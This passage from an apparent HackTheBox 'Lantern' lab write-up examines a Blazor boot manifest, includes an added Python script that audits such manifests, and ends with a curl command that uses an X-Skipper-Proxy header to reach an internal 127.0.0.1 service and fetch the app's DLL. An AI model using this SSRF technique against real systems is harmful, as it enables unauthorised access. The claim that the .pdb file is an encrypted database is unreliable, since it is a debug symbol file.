"System.Runtime.Loader.dll": "sha256-04rg75EwwT+qlxSxKNgA\/it8MbVGDr0Xmo30v\/XtW4Q=",
"System.Runtime.Numerics.dll": "sha256-9Lyq9ORGeQFNnJWFUIMzcCVONRm33mMZbcHQ+7kYkqw=",
"System.Runtime.Serialization.Formatters.dll": "sha256-g4\/A5rwaNm8ntiwoA5n2bhpO1XoMBRWDba1wquClO8I=",
"System.Runtime.Serialization.Json.dll": "sha256-WAS9zuFqSGp55zoZVEWUVl+JRk5RN6wVKXkSziM3OOw=",
"System.Runtime.Serialization.Primitives.dll": "sha256-DdvnEF4CSXMqkj0quXgPLlWeBhOEwIK8tEM3Nj132aM=",
"System.Runtime.Serialization.Xml.dll": "sha256-CAGIKrs6UDzetxsW5agYluy6Ku1Ea0UFOeNkswJtqh8=",
"System.Runtime.Serialization.dll": "sha256-OLkN7ThXD3qZPadaVb\/V+Sd6HsIbYXDIEKJVCfOZ5V4=",
"System.Runtime.dll": "sha256-u+p1S6CWZDwJPi5yNoSZRRiispI7HwTKRxrdHErPkE8=",
"System.Security.AccessControl.dll": "sha256-2KdkUTv\/4QPdccH96o1athaPwNRlEFqAG1D1zC55Ywg=",
"System.Security.Claims.dll": "sha256-kgo+HeoL9k2ntqYDslCFA5WhBDMEjo3RKAs04ig\/2iE=",
"System.Security.Cryptography.Algorithms.dll": "sha256-A3pi8LOTmfQIFFXXJc\/V2uOa2EvA2IOpwGDwwf8Xu9A=",
"System.Security.Cryptography.Cng.dll": "sha256-BTtw7nptKY75SZqEGpzteOkSJ1riOa+ynW4t8iELp1c=",
"System.Security.Cryptography.Csp.dll": "sha256-jgxjePXbj7T\/imxqEuM7yxndarlPmO1Mhzx1KSsbE\/o=",
"System.Security.Cryptography.Encoding.dll": "sha256-Yu9rAfznTa+e51IdWkbpGniy\/7zr\/81SlaKE6xeAbAE=",
"System.Security.Cryptography.OpenSsl.dll": "sha256-doNcZf7tQQexD78KDZYAbF3BIpj0zDkvBiKeSInZ\/PI=",
"System.Security.Cryptography.Primitives.dll": "sha256-KuFuBLIlVhgZc9rkRbtJ4byWpfROhUNUjB6nBYab7DY=",
"System.Security.Cryptography.X509Certificates.dll": "sha256-4OwV7OWq8+y1raWVDGXWTHGjq\/Q6LFqFMn5MoMqNCW4=",
"System.Security.Principal.Windows.dll": "sha256-QR3r1ek64aGNBXWL5DLmj0t3NBMBskYDhwGDCrLQ\/o0=",
"System.Security.Principal.dll": "sha256-AvspaIoT5XoryB02FU3R2VE+BbTUzIjY1TQtk+Igx1o=",
"System.Security.SecureString.dll": "sha256-dPPmyPEcJ6\/7BDnE22U04KLqZz9ylEGz3YcVGBoeAhU=",
"System.Security.dll": "sha256-lVo1IzpQ8ApPfXku3TfD+\/WMupxwhj27kxNklLs00uM=",
"System.ServiceModel.Web.dll": "sha256-u6BruHSOCTTwM3mYmrZrI4ZapE+BXNjEhCEhZzncb8Q=",
"System.ServiceProcess.dll": "sha256-q9qiSJlSYsOOAiGL2eoKMB6tmGWJ0jiiiV03QkJj+9Y=",
"System.Text.Encoding.CodePages.dll": "sha256-h4c5zE7USMsMhnXdicO+QFRHhrSH00yG+o4hRoqmqsI=",
"System.Text.Encoding.Extensions.dll": "sha256-VKQUSIrhN95oGK0ZNOPersGZUsrV8OkM5B\/izDGHaeI=",
"System.Text.Encoding.dll": "sha256-cvkUmV\/SjtZC2SSfM3Z+P0+gbORa\/QUTnqYefItcMGo=",
"System.Text.Encodings.Web.dll": "sha256-eWzqi7I99oo4C6cURzIg\/VRsDO8GfDDg9BU7xHWhshI=",
"System.Text.Json.dll": "sha256-PNCDoNNxxyyeGxORbdIYh0kYj7UA+nLzlH+TzAjJtGU=",
"System.Text.RegularExpressions.dll": "sha256-qoZcnZH56UJS6ZNiULVv45neh+C5fylKYXWVVCBoVZI=",
"System.Threading.Channels.dll": "sha256-iVA9v1W3Kh8tsRVShEC5puyrQ5z8K8Jd9NG13NNGNcg=",
"System.Threading.Overlapped.dll": "sha256-4f7W3R6ayi71vj8Dx0V+b6LKWyBbWgXzIvYoVx6sB\/E=",
"System.Threading.Tasks.Dataflow.dll": "sha256-brkgW8gANJqDXLXZdLO\/4lBjsSI1ePj34x1ns3cfrew=",
"System.Threading.Tasks.Extensions.dll": "sha256-PENIL2r6939Zb5O7Fbd79vTqPJGtG7e4rZNo8t8GOpA=",
"System.Threading.Tasks.Parallel.dll": "sha256-O2W\/J4L8RL3MogHSrgHco2ZB00Q44wpJi59+l+RenbA=",
"System.Threading.Tasks.dll": "sha256-4DG5EctwgYdGf2XhwKU1V\/kDFo1zDwHRt+\/\/MlbxJIk=",
"System.Threading.Thread.dll": "sha256-Eu265Abl4uYVdiEC1SiBUm1CCZ7C+t\/wHqnKgtenUJc=",
"System.Threading.ThreadPool.dll": "sha256-eR1VbM1uBfWEvwE9103JLehTShaojDIfOzAEL3BRtek=",
"System.Threading.Timer.dll": "sha256-ohxHNOfivKoEfv6hFt3hRJrUrM7eRLPdX16pZ3sl40w=",
"System.Threading.dll": "sha256-PJukAfA8ombxR1eZIWeENQmv9cTirn98W+tMp9JcJN8=",
"System.Transactions.Local.dll": "sha256-kynD5I7qlEINTpHQAx9OCNHgDSG2MiaP7eKr5nE2ux0=",
"System.Transactions.dll": "sha256-8D1kOFTvSoOImIhguPn7hcE9jDscPMoiXNDmMkLIhZQ=",
"System.ValueTuple.dll": "sha256-oNAUfyqU\/GxYAN27YzGmESuB04CIUSWi\/d0X1whLjbE=",
"System.Web.HttpUtility.dll": "sha256-5J7arVRsJc4JnZXrXNijEu9GyuzstA7oWh5N+BcUgmE=",
"System.Web.dll": "sha256-jL2UY\/jFcH+aR4qy5E5D8aEpUPs0QUPeAen5UVcZyR8=",
"System.Windows.dll": "sha256-8bl48xmJJ3TBcL+t29aLb660\/zfuxABv0NlNswPdsXE=",
"System.Xml.Linq.dll": "sha256-PW5GMzZw4Kfb+PxHM\/3esXbvflMgxv2Gozi4c8r+KLA=",
"System.Xml.ReaderWriter.dll": "sha256-92YmEAsQ+w8VKPUIZtNcPiSJ17bjTPtT8PmsI8Q0sGI=",
"System.Xml.Serialization.dll": "sha256-YgESAq2VAp6Dm+Wp19D+FRkDgZk\/MZ3tJwB2SuRu7Xk=",
"System.Xml.XDocument.dll": "sha256-reoziM29CWZA9uIQMVdtm7s9yIQCuanDqA2ELdwILEs=",
"System.Xml.XPath.XDocument.dll": "sha256-yVwzItpv4vHQDwQCqM78Ydv2uHtSJYcZWJ1ZaRW\/ftc=",
"System.Xml.XPath.dll": "sha256-4axHEHFvTq1\/VzammSA38SdUn4qbE\/4070jr6gQHvco=",
"System.Xml.XmlDocument.dll": "sha256-S+Xk7z\/96t8ab30tKeYkqJi8fCecr7VDKhYGYUyWoTo=",
"System.Xml.XmlSerializer.dll": "sha256-8phryTFy1MDMCmjKD0tOs071P7GjND0DJdiSUZBpBPc=",
"System.Xml.dll": "sha256-Rg18wjp7\/BZHM0dC51OnrC39cUCu25BOS9+i8r7bUrM=",
"System.dll": "sha256-YKqpzE+7ICNb3IBWe6kXM+dCR18TTaRnThuOy6NLcG4=",
"WindowsBase.dll": "sha256-k04wZob3UNWysInC\/KRbcfiSMMSXDv56yL6raT6AnZk=",
"mscorlib.dll": "sha256-veli+XvWHzkA3s4t4DKI+XiyNMpfHQjiO002+ExANkU=",
"netstandard.dll": "sha256-O9JhHo5KqxkmwmapuxuhG\/iMRV7RHcrCDO9z+yv+8yI=",
"System.Private.CoreLib.dll": "sha256-6rKu8tPdUGsvbSpesoNMVzbx7bNqPRMPV34eI7vSYaQ=",
"InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
},
"extensions": null,
"lazyAssembly": null,
"libraryInitializers": null,
"pdb": {
"InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
},
"runtime": {
"dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
"icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
"icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
"icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
"icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
"dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
"dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
},
"satelliteResources": null
}
}
Checking the blazor.boot.json file indeed lists out all the loaded packages and modules.
Two files seem to stand out: InternaLantern.dll and InternaLantern.pdb.
While the InternaLantern.pdb file appears to be an encrypted database, InternaLantern.dll is a compiled binary for the internal web application.
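The same manifest can be reviewed by whoever publishes the application before it ships. The following is an added example, not part of the original write-up: it parses a blazor.boot.json and reports what a browser client can learn from it. The manifest below is constructed with placeholder hashes, and the framework prefix list and data-access markers are assumptions to adjust per project.

```python
import json

# Assumed vendor/framework name patterns; anything else is treated as application code.
FRAMEWORK_PREFIXES = ("Microsoft.", "System.", "SQLitePCLRaw.", "Radzen.")
FRAMEWORK_NAMES = {"mscorlib.dll", "netstandard.dll", "WindowsBase.dll"}
# Assumed markers for data-access libraries worth a second look in a client bundle.
DATA_ACCESS_MARKERS = ("sqlite", "entityframeworkcore")

# Constructed manifest following the structure shown above; hashes are placeholders.
SAMPLE_MANIFEST = """
{
  "debugBuild": true,
  "entryAssembly": "InternaLantern",
  "resources": {
    "assembly": {
      "Microsoft.AspNetCore.Components.dll": "sha256-PLACEHOLDER",
      "Microsoft.Data.Sqlite.dll": "sha256-PLACEHOLDER",
      "Microsoft.EntityFrameworkCore.Sqlite.dll": "sha256-PLACEHOLDER",
      "Radzen.Blazor.dll": "sha256-PLACEHOLDER",
      "System.Private.CoreLib.dll": "sha256-PLACEHOLDER",
      "InternaLantern.dll": "sha256-PLACEHOLDER"
    },
    "pdb": {"InternaLantern.pdb": "sha256-PLACEHOLDER"},
    "runtime": {"dotnet.wasm": "sha256-PLACEHOLDER"}
  }
}
"""


def is_framework(name):
    """True for assemblies matching the assumed framework/vendor patterns."""
    return name in FRAMEWORK_NAMES or name.startswith(FRAMEWORK_PREFIXES)


def audit_boot_manifest(text):
    """Summarise what a published boot manifest discloses to any client."""
    manifest = json.loads(text)
    resources = manifest.get("resources") or {}
    assemblies = resources.get("assembly") or {}
    pdbs = resources.get("pdb") or {}  # null when no symbol files are published
    entry = (manifest.get("entryAssembly") or "") + ".dll"

    report = {
        "debug_build": bool(manifest.get("debugBuild")),
        "pdb_files": sorted(pdbs),
        "app_assemblies": sorted(n for n in assemblies
                                 if n == entry or not is_framework(n)),
        "data_access": sorted(n for n in assemblies
                              if any(m in n.lower() for m in DATA_ACCESS_MARKERS)),
    }

    findings = []
    if report["debug_build"]:
        findings.append("debugBuild is true: a debug build was published")
    for name in report["pdb_files"]:
        findings.append(f"symbol file published under _framework/: {name}")
    for name in report["app_assemblies"]:
        findings.append(f"application assembly downloadable by any client: {name}")
    if report["data_access"]:
        findings.append("data-access libraries ship to the browser, so any data or "
                        "secrets they read must be treated as client-visible: "
                        + ", ".join(report["data_access"]))
    report["findings"] = findings
    return report


if __name__ == "__main__":
    for finding in audit_boot_manifest(SAMPLE_MANIFEST)["findings"]:
        print("-", finding)
```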
InternaLantern.dll
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i -s http://lantern.htb/_framework/InternaLantern.dll -H 'X-Skipper-Proxy: http://127.0.0.1:5000/' -o InternaLantern.dll
After downloading the compiled binary, I will decompile it to check the source code.